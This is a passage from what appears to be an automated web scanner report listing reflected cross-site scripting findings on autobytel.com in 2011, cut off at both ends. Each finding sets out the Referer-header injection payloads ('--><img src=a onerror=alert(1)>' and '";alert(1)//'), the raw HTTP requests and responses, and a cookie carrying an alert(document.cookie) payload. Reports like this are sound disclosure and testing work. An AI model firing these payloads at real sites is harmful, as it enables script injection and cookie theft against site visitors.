Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:53:09 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E993ca%22%3Balert%281%29%2F%2F86d7bd50876;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 55412

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~993ca";alert(1)//86d7bd50876";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "487245C4-FF7A-DD97-59131142
...[SNIP]...

4.1926. http://www.autobytel.com/content/home/help/index.cfm/action/privacy [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/privacy

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 80808--><img%20src%3da%20onerror%3dalert(1)>f990e3ef845 was submitted in the Referer HTTP header. This input was echoed as 80808--><img src=a onerror=alert(1)>f990e3ef845 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:53:27 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E80808%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ef990e3ef845;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 55450

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>f990e3ef845 -->
...[SNIP]...

4.1927. http://www.autobytel.com/content/home/help/index.cfm/action/terms [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/terms

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 518a5--><img%20src%3da%20onerror%3dalert(1)>3344f3486f4 was submitted in the Referer HTTP header. This input was echoed as 518a5--><img src=a onerror=alert(1)>3344f3486f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/home/help/index.cfm/action/terms HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=518a5--><img%20src%3da%20onerror%3dalert(1)>3344f3486f4

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:41:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:41:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:15 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:41:15 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E518a5%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E3344f3486f4;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 54812

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>3344f3486f4 -->
...[SNIP]...

4.1928. http://www.autobytel.com/content/home/help/index.cfm/action/terms [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/terms

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57975"%3balert(1)//9e360c8f5f0 was submitted in the Referer HTTP header. This input was echoed as 57975";alert(1)//9e360c8f5f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:41:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:41:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:08 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:41:08 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E57975%22%3Balert%281%29%2F%2F9e360c8f5f0;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 54774

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~57975";alert(1)//9e360c8f5f0";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48042108-D848-C946-3E10BA4C
...[SNIP]...

4.1929. http://www.autobytel.com/content/home/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19094"%3balert(1)//ce2e6207b9e was submitted in the Referer HTTP header. This input was echoed as 19094";alert(1)//ce2e6207b9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=19094"%3balert(1)//ce2e6207b9e

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 70798
Expires: Mon, 24 Jan 2011 23:47:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:46 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:45 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E19094%22%3Balert%281%29%2F%2Fce2e6207b9e;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~19094";alert(1)//ce2e6207b9e";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4840A56E-F691-6D7A-D677BD4D
...[SNIP]...

4.1930. http://www.autobytel.com/content/home/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload acf44--><img%20src%3da%20onerror%3dalert(1)>f2e0ef7d622 was submitted in the Referer HTTP header. This input was echoed as acf44--><img src=a onerror=alert(1)>f2e0ef7d622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:05 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Eacf44%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ef2e0ef7d622;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 70827

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>f2e0ef7d622 -->
...[SNIP]...

4.1931. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a81cb"%3balert(1)//4abd427f15d was submitted in the Referer HTTP header. This input was echoed as a81cb";alert(1)//4abd427f15d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=a81cb"%3balert(1)//4abd427f15d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:41:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:41:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:41:10 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:41:10 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ea81cb%22%3Balert%281%29%2F%2F4abd427f15d;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 75157

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~a81cb";alert(1)//4abd427f15d";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4A27937D-F1C2-17A3-3CDF78B9
...[SNIP]...

4.1932. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 9d81c--><img%20src%3da%20onerror%3dalert(1)>2c2ef4eb7df was submitted in the Referer HTTP header. This input was echoed as 9d81c--><img src=a onerror=alert(1)>2c2ef4eb7df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:44:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:44:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:44:16 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:44:16 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E9d81c%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E2c2ef4eb7df;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 75195

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>2c2ef4eb7df -->
...[SNIP]...

4.1933. http://www.autobytel.com/content/research/article/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c06a"%3balert(1)//ecd19609a5d was submitted in the Referer HTTP header. This input was echoed as 8c06a";alert(1)//ecd19609a5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/article/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=8c06a"%3balert(1)//ecd19609a5d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:47 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:47 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E8c06a%22%3Balert%281%29%2F%2Fecd19609a5d;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 42845

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~8c06a";alert(1)//ecd19609a5d";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47EE99F2-A594-77AD-EB2F0AA6
...[SNIP]...

4.1934. http://www.autobytel.com/content/research/article/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 5f58d--><img%20src%3da%20onerror%3dalert(1)>4dfd8201d14 was submitted in the Referer HTTP header. This input was echoed as 5f58d--><img src=a onerror=alert(1)>4dfd8201d14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:57 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:57 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E5f58d%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E4dfd8201d14;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 42883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>4dfd8201d14 -->
...[SNIP]...

4.1935. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Auto%20Show

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43339"%3balert(1)//8f32a5fa65 was submitted in the Referer HTTP header. This input was echoed as 43339";alert(1)//8f32a5fa65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/article/index.cfm/filters/Auto%20Show HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=43339"%3balert(1)//8f32a5fa65

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:34:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:34:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:34:08 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:34:08 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E43339%22%3Balert%281%29%2F%2F8f32a5fa65;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 53152

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~43339";alert(1)//8f32a5fa65";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47C5C915-C42B-29C6-CB3C4820
...[SNIP]...

4.1936. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Auto%20Show

Issue detail

